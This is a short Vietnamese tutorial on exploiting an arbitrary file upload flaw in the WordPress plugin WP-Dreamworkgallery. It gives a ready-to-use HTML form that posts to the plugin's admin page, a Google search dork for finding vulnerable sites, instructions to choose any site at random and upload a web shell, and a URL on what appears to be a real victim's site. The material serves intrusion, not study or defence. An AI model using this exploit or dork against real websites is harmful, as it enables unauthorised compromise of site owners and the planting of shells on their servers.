Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

Lỗi này cho phép chúng ta UpShell lên một cách thoải mái thông qua một file .html ngay từ localhost

Bước 1: Tạo 1 file Upload.html

<html>
<body>
<form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Bước 2: Tìm Web bị lỗi

Tìm lỗi bằng cách vào Google.com gõ lệnh

inurl:/wp-content/plugins/wp-dreamworkgallery/

Bước 3: Chọn 1 site bất kỳ

Thay link trang Web bị lỗi vào code ở Bước 1, nhớ Save lại nhé

Bước 4: Up Shell

Mở File Upload.html ở Bước 1 lên, và Up Shell lên

Lưu ý: Đoạn lỗi sau khi Up shell

Copy dòng này vào Link site bị lỗi là OK

http://www.presprint.rs/wp-content/uploads/dreamwork/334_uploadfolder/big/1.html

Đánh giá post
Exit mobile version